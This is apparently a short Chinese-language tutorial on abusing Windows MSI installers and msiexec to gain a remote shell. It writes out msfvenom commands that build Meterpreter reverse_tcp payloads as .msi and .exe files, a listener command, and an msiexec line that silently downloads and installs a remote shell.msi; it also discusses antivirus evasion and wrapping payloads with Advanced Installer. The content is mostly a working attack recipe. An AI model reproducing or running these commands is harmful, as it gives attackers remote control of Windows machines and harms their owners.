1. 概述

在windows下很多 软件安装就是 .msi 格式的。当Windows操作系统安装了Windows Installer引擎, ⽽MSI软件包使⽤该引擎来 安装应⽤程序,解释包和安装产品的可执⾏程序就是我 们这⽤到 的Msiexec.exe。

2. 利用

2.1 生成msi文件

直接使用msfvenom来生成相应的msi文件,相关生成的命令如下所示:

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 lport=4444 -f msi -o 1.msi

image.png

2.2 监听

直接使用handler来监听,如下所示:

  1. handler -H 192.168.1.4 -P 4444 -p windows/meterpreter/reverse_tcp

image.png

2.3 运行上线

2.3.1 本地执行

直接运行msi文件就可以上线了
image.png
image.png

2.3.2 远程加载

同时,也可以使用msiexec来远程加载,相关的命令如下所示:

  1. msiexec /q /i http://x.x.x.x/shell.msi

image.png

2.4 免杀能力

这种原始生成的msi文件是没有免杀效果的,常规的杀软就可以静态和动态查杀。
image.png
image.png

3. 利用advanced installer来生成msi文件

3.1 下载

下载地址为:http://www.pc6.com/softview/SoftView_13165.html

3.2 生成payload

直接利用msf来生成payload,

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 lport=5555 -f exe -o 5555.exe

image.png

3.3 使用advanced installer生成项目

image.png
这里面因为工具授权的问题就不朝下进行了,其原理也是利用exe来生成msi文件,其生成以后免杀效果更差。这里就不演示了。